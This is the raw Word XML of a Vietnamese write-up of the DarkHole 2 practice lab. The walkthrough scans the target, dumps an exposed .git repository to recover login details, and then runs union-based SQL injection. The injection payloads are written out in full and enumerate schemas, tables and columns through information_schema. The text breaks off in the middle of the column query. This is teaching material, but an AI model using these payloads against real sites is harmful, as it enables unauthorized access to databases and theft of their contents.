    <w:p w14:paraId="5285A945" w14:textId="179C468B" w:rsidR="002C41E3" w:rsidRDefault="002C41E3" w:rsidP="002C41E3">
      <w:r w:rsidRPr="002C41E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2912DEBB" wp14:editId="7D649B07">
            <wp:extent cx="5731510" cy="169037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690370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B04A8" w14:textId="76D212CE" w:rsidR="002C41E3" w:rsidRDefault="002C41E3" w:rsidP="002C41E3">
      <w:r>
        <w:t>Sử dụng nmap quét các cổng đang mở của máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74285388" w14:textId="781452B2" w:rsidR="002C41E3" w:rsidRDefault="002C41E3" w:rsidP="002C41E3">
      <w:r>
        <w:t>Tiếp tục vẫn là một máy chủ web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5779E" w14:textId="0F83380D" w:rsidR="002C41E3" w:rsidRDefault="00247F9F" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00247F9F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58A7E223" wp14:editId="74B8E538">
            <wp:extent cx="5731510" cy="2850515"/>
            <wp:effectExtent l="0" t="0" r="254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850515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3809F429" w14:textId="70B1C426" w:rsidR="00473A68" w:rsidRDefault="00473A68" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Nhìn sơ qua, ta biết đây là version 2 của </w:t>
      </w:r>
      <w:r w:rsidR="00B93D29">
        <w:t xml:space="preserve">DarkHole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBED66B" w14:textId="38343AE6" w:rsidR="00B93D29" w:rsidRDefault="00B93D29" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00B93D29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B839C4E" wp14:editId="71ED5073">
            <wp:extent cx="5731510" cy="2379345"/>
            <wp:effectExtent l="0" t="0" r="254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379345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C44B6B" w14:textId="331517DC" w:rsidR="00B93D29" w:rsidRDefault="00B93D29" w:rsidP="002C41E3">
      <w:r>
        <w:t>Tuy nhiên khi login, chúng ta không thấy nút đăng ký thành viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15F7F4" w14:textId="56CF51A6" w:rsidR="00247F9F" w:rsidRDefault="00473A68" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00473A68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8E2D81" wp14:editId="31186263">
            <wp:extent cx="5731510" cy="191325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913255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C24BE" w14:textId="309C1A68" w:rsidR="007A6CEC" w:rsidRDefault="007A6CEC" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Thực hiện quét các thư mục con, ta phát hiện có một mục lưu trữ git của ứng dụng với đường dẫn: </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="006B1B3F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.145/.git/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33BC49E7" w14:textId="120B70C4" w:rsidR="007A6CEC" w:rsidRDefault="007A6CEC" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Ta sẽ clone ứng dụng về bằng </w:t>
      </w:r>
      <w:r w:rsidR="007348AA">
        <w:t xml:space="preserve">công cụ </w:t>
      </w:r>
      <w:r w:rsidR="007348AA" w:rsidRPr="007348AA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>git_dumper</w:t>
      </w:r>
      <w:r w:rsidR="007348AA">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007348AA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF1C899" w14:textId="1E03C37D" w:rsidR="007348AA" w:rsidRDefault="007B6A94" w:rsidP="002C41E3">
      <w:r w:rsidRPr="007B6A94">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F64E354" wp14:editId="5C720A58">
            <wp:extent cx="4648603" cy="329974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48603" cy="3299746"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F4D02" w14:textId="009ADD06" w:rsidR="007B6A94" w:rsidRDefault="00EE281B" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Trong thư mục config chứa file config.php với thông tin quan trọng về </w:t>
      </w:r>
      <w:r w:rsidR="00C8149C">
        <w:t xml:space="preserve">database </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501DD52B" w14:textId="42357BB5" w:rsidR="00C8149C" w:rsidRDefault="00C8149C" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00C8149C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A91541B" wp14:editId="5454545E">
            <wp:extent cx="4580017" cy="8992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80017" cy="899238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D79544" w14:textId="23913FB8" w:rsidR="00C8149C" w:rsidRDefault="00C8149C" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Để ý trong thư mục logs có thông tin là </w:t>
      </w:r>
      <w:r w:rsidR="005E243B">
        <w:t>admin đã thêm 1 tài khoản mặc định vào trang lohgin.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16464C8A" w14:textId="4B7C2453" w:rsidR="005E243B" w:rsidRDefault="005E243B" w:rsidP="002C41E3">
      <w:r w:rsidRPr="005E243B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB19F82" wp14:editId="6BC6FA45">
            <wp:extent cx="5731510" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="254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47675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="748A5659" w14:textId="53C27F5A" w:rsidR="005E243B" w:rsidRDefault="005E243B" w:rsidP="002C41E3">
      <w:r>
        <w:t>Giờ hãy thử log ra xem chúng ta có gì:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C896B" w14:textId="4708B8D3" w:rsidR="005E243B" w:rsidRDefault="005E243B" w:rsidP="002C41E3">
      <w:r w:rsidRPr="005E243B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="593DA564" wp14:editId="2CFED39B">
            <wp:extent cx="5128704" cy="32845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28704" cy="3284505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A91695F" w14:textId="4EDB8EC6" w:rsidR="00FF6CBF" w:rsidRDefault="005E243B" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Với các id của commit, ta có thể xem chỉnh sửa </w:t>
      </w:r>
      <w:r w:rsidR="00FF6CBF">
        <w:t xml:space="preserve">của id đó với lần commit cuối cùng gần nhất bằng cách sử dụng câu lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00FF6CBF" w:rsidRPr="00FF6CBF">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>git diff &lt;commit&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580128BB" w14:textId="74F87CE5" w:rsidR="00FF6CBF" w:rsidRDefault="0061710C" w:rsidP="002C41E3">
      <w:r w:rsidRPr="0061710C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1917D226" wp14:editId="51DBB696">
            <wp:extent cx="5731510" cy="260985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609850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F1AD1" w14:textId="4E9866D4" w:rsidR="0061710C" w:rsidRDefault="0061710C" w:rsidP="002C41E3">
      <w:r>
        <w:t>Với thông tin đăng nhập đã có, hãy thử đăng nhập vào ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="009F0FE7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29978E" w14:textId="2319D846" w:rsidR="00457A52" w:rsidRDefault="00BC780F" w:rsidP="002C41E3">
      <w:r>
        <w:t>Với vị trí admin, bây giờ thứ chúng ta muốn với tới nhất là truy cập được vào</w:t>
      </w:r>
      <w:r w:rsidR="00A84331">
        <w:t xml:space="preserve"> server, tuy nhiên cần có tài khoản, mật khẩu. Hãy kiểm tra xem web có bị lỗi SQLi hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0085DB72" w14:textId="7104AE05" w:rsidR="007D6A52" w:rsidRDefault="00E7177E" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Bằng cách thêm dấu nháy đơn (‘) hoặc dấu nháy kép (“) và trong trường hợp người lập trình </w:t>
      </w:r>
      <w:r w:rsidR="007D6A52">
        <w:t>cấu hình lỗi đầu ra được hiển thị, ta có thể biết web có bị SQLi hay không</w:t>
      </w:r>
      <w:r w:rsidR="00337ED2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B94E10A" w14:textId="23742348" w:rsidR="00337ED2" w:rsidRDefault="00337ED2" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00337ED2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DF4A4D7" wp14:editId="07E97D2F">
            <wp:extent cx="5731510" cy="176085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760855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A4544" w14:textId="33B4AC1D" w:rsidR="00337ED2" w:rsidRDefault="00337ED2" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Vậy là ứng dụng web </w:t>
      </w:r>
      <w:r w:rsidR="00216219">
        <w:t xml:space="preserve">có khả năng </w:t>
      </w:r>
      <w:r>
        <w:t>bị lỗi SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5426AE39" w14:textId="2511163A" w:rsidR="00337ED2" w:rsidRDefault="00337ED2" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Tiếp theo chúng ta sẽ xác định số lượng cột của </w:t>
      </w:r>
      <w:r w:rsidR="00292E65">
        <w:t>bảng dữ liệu chứa cột id</w:t>
      </w:r>
      <w:r w:rsidR="00ED53B0">
        <w:t>, ở đây ta sẽ thử với ORDER BY.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8E6CAA" w14:textId="6FD8FEB0" w:rsidR="00ED53B0" w:rsidRDefault="00ED53B0" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Câu lệnh injection chúng ta sẽ thử là </w:t>
      </w:r>
      <w:r w:rsidR="003102A2">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>1’</w:t>
      </w:r>
      <w:r w:rsidRPr="00314564">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY x</w:t>
      </w:r>
      <w:r w:rsidR="00644F37">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00314564" w:rsidRPr="00314564">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302119CD" w14:textId="65A31B22" w:rsidR="00314564" w:rsidRDefault="00314564" w:rsidP="002C41E3">
      <w:r>
        <w:t>Với x là số lượng cột, nếu x lớn hơn số lượng cột của bảng, nó sẽ gây ra lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016A81E1" w14:textId="77777777" w:rsidR="00110EF4" w:rsidRDefault="00314564" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">‘-- -‘ </w:t>
      </w:r>
      <w:r w:rsidR="00110EF4">
        <w:t>được sử dụng để comment phần còn lại của query thay vì sử dụng ‘--' do nó chỉ comment đến hết dòng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54C649" w14:textId="7F1EE999" w:rsidR="00314564" w:rsidRDefault="00314564" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E77907">
        <w:t>Sau khi thử từ 1 đến 7, web bị lỗi khi x bằng 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF495EE" w14:textId="0D31A1E6" w:rsidR="00E77907" w:rsidRDefault="00E77907" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00E77907">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6080CA95" wp14:editId="660FF4DD">
            <wp:extent cx="5731510" cy="1782445"/>
            <wp:effectExtent l="0" t="0" r="254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782445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C9F57" w14:textId="1F113023" w:rsidR="00E77907" w:rsidRDefault="00E77907" w:rsidP="002C41E3">
      <w:r>
        <w:t>Vậy có 6 cột tất cả, bao gồm id. Tiếp đến chúng ta sẽ sử dụng UNION để thực hiện thêm query sau SELECT</w:t>
      </w:r>
      <w:r w:rsidR="00AB5820">
        <w:t xml:space="preserve"> id là SELECT thông tin về bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71707B71" w14:textId="2B1A9CAD" w:rsidR="003102A2" w:rsidRDefault="003102A2" w:rsidP="002C41E3">
      <w:r>
        <w:t>Nhưng trước hết ta phải xem các cột nào có thể trích xuất thông tin của bảng</w:t>
      </w:r>
      <w:r w:rsidR="00B32F54">
        <w:t xml:space="preserve"> bằng đoạn mã </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F21A8C" w14:textId="36F95F35" w:rsidR="008D6BEC" w:rsidRPr="00B32F54" w:rsidRDefault="003D4CC3" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B32F54">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NULL’</w:t>
      </w:r>
      <w:r w:rsidR="00750585" w:rsidRPr="00B32F54">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION </w:t>
      </w:r>
      <w:r w:rsidRPr="00B32F54">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL </w:t>
      </w:r>
      <w:r w:rsidR="00750585" w:rsidRPr="00B32F54">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>SELECT 1,2,3,4,5,6 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C63D3D" w14:textId="4101C413" w:rsidR="00B32F54" w:rsidRDefault="00966A84" w:rsidP="002C41E3">
      <w:r>
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCBDEF2" w14:textId="4D8DFC50" w:rsidR="00966A84" w:rsidRDefault="00966A84" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">NULL là giá trị </w:t>
      </w:r>
      <w:r w:rsidR="00F56443">
        <w:t>có trong mọi loại dữ liệu, khi chọn user có id là NULL sẽ trả về 1 user với thông tin trống</w:t>
      </w:r>
      <w:r w:rsidR="00222EF0">
        <w:t>, qua đó ta có thể hiển thị giá trị các cột sẽ được trích xuất vào các cột trống thông tin này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B155BC8" w14:textId="1F699399" w:rsidR="00222EF0" w:rsidRDefault="00222EF0" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>UNION ALL</w:t>
      </w:r>
      <w:r w:rsidR="00CF0AC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF0AC2" w:rsidRPr="00CF0AC2">
        <w:t>dùng để kết hợp bộ kết quả từ 2 hoặc nhiều lệnh SELECT trong SQL Server</w:t>
      </w:r>
      <w:r w:rsidR="00CF0AC2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CF0AC2" w:rsidRPr="00CF0AC2">
        <w:t xml:space="preserve"> toán tử UNION ALL trả về tất cả các hàng từ truy vấn và không xóa các hàng trùng lặp</w:t>
      </w:r>
      <w:r w:rsidR="00CF0AC2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E4EDC" w:rsidRPr="007E4EDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E4EDC" w:rsidRPr="007E4EDC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A775018" wp14:editId="43E0BAC3">
            <wp:extent cx="5731510" cy="234632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346325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050165F" w14:textId="2052596D" w:rsidR="007E4EDC" w:rsidRDefault="007E4EDC" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Kết quả trả về cho thấy các cột 2,3,5,6 có thể được sử dụng để trích xuất thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D5D1A" w14:textId="02A908C3" w:rsidR="00762B55" w:rsidRDefault="00762B55" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Tiếp theo chúng ta sẽ xác định tên databse</w:t>
      </w:r>
      <w:r w:rsidR="00D023DC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>, điều này chúng ta đã biết khi clone source code ứng dụng và nó trong file config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1D285" w14:textId="06DCD4E6" w:rsidR="00D023DC" w:rsidRDefault="00D023DC" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00D023DC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34422C15" wp14:editId="69A1FFBD">
            <wp:extent cx="4511431" cy="830652"/>
            <wp:effectExtent l="0" t="0" r="381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11431" cy="830652"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E029DC" w14:textId="007C383D" w:rsidR="00D023DC" w:rsidRDefault="00D023DC" w:rsidP="002C41E3">
      <w:r>
        <w:t>Nhưng chúng ta sẽ làm một cách tổng quan hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38863DB9" w14:textId="12A5B5DA" w:rsidR="00D023DC" w:rsidRDefault="001322F5" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Như đã biết, mọi cơ sở dữ liệu </w:t>
      </w:r>
      <w:r w:rsidR="00EE5F5E">
        <w:t>My</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQL đều có 1 </w:t>
      </w:r>
      <w:r w:rsidR="0095391D">
        <w:t>cơ sở dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> information_schema chứa thông tin về </w:t>
      </w:r>
      <w:r w:rsidR="00277537">
        <w:t>các cơ sở dữ liệu khác của MySQL</w:t>
      </w:r>
      <w:r w:rsidR="00EE5F5E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EE5F5E" w:rsidRPr="00EE5F5E">
        <w:t>Trong INFORMATION_SCHEMA có nhiều bảng và view tuy nhiên có lẽ hay sử dụng nhiều nhất là các bảng TABLES, COLUMNS và USER_PRIVILEGES.</w:t>
      </w:r>
      <w:r w:rsidR="0095391D">
        <w:t xml:space="preserve"> Và trong cơ sở dữ liệu này có một bảng hệ thống chứa thông tin về các lược đồ tên là SCHEMA.</w:t>
      </w:r>
      <w:r w:rsidR="00847715">
        <w:t xml:space="preserve"> Khi muốn truy xuất tên các lược đồ này có thể sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00E6117A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E6117A" w:rsidRPr="00E6117A">
        <w:t>SCHEMA_NAME</w:t>
      </w:r>
      <w:r w:rsidR="00E6117A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E2E81" w14:textId="07287C13" w:rsidR="00E6117A" w:rsidRDefault="00E6117A" w:rsidP="002C41E3">
      <w:r>
        <w:t>Khi đó mã injection tiếp theo là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CA0FF" w14:textId="3D24AFEB" w:rsidR="00E6117A" w:rsidRPr="00E6117A" w:rsidRDefault="00E6117A" w:rsidP="002C41E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NULL' UNION ALL SELECT 1,GROUP_CONCAT(schema_name),3,4,5,6 FROM information_schema.schemata -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DA329" w14:textId="40A62DCC" w:rsidR="00E6117A" w:rsidRDefault="00AA0425" w:rsidP="002C41E3">
      <w:r w:rsidRPr="00AA0425">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD68A9E" wp14:editId="3588154E">
            <wp:extent cx="5731510" cy="2397125"/>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397125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4237CA7E" w14:textId="28AA57F0" w:rsidR="00AA0425" w:rsidRDefault="00AA0425" w:rsidP="002C41E3">
      <w:r>
        <w:t xml:space="preserve">Và darkhole_2 là </w:t>
      </w:r>
      <w:r w:rsidR="00F726D5">
        <w:t>cơ sở dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chúng ta cần truy xuất thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9FD644" w14:textId="564D1760" w:rsidR="00AA0425" w:rsidRDefault="00AA0425" w:rsidP="002C41E3">
      <w:r>
        <w:t>Đến đây thì đơn giản hơn rồi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57039BCB" w14:textId="1398EBDB" w:rsidR="00AA0425" w:rsidRPr="00E6117A" w:rsidRDefault="00AA0425" w:rsidP="00AA0425">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NULL' UNION ALL SELECT 1,GROUP_CONCAT(</w:t>
      </w:r>
      <w:r w:rsidR="00B50532">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>_name),3,4,5,6 FROM information_schema.</w:t>
      </w:r>
      <w:r w:rsidR="00B50532">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">tables WHERE table_schema = </w:t>
      </w:r>
      <w:r w:rsidR="00B50532" w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00B50532">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>darkhole_2</w:t>
      </w:r>
      <w:r w:rsidR="00B50532" w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6686A8B9" w14:textId="5DD4E528" w:rsidR="00AA0425" w:rsidRDefault="007A12EC" w:rsidP="002C41E3">
      <w:r w:rsidRPr="007A12EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="722ADEA7" wp14:editId="2E99D032">
            <wp:extent cx="5731510" cy="221805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218055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3573EF" w14:textId="6BA24118" w:rsidR="007A12EC" w:rsidRPr="00E6117A" w:rsidRDefault="007A12EC" w:rsidP="007A12EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>NULL' UNION ALL SELECT 1,GROUP_CONCAT(</w:t>
      </w:r>
      <w:r w:rsidR="00F726D5">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6117A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>_name),3,4,5,6 FROM information_schema.</w:t>
      </w:r>
      <w:r w:rsidR="00F726D5">
        <w:rPr>
          <w:color w:val="0070C0"/>
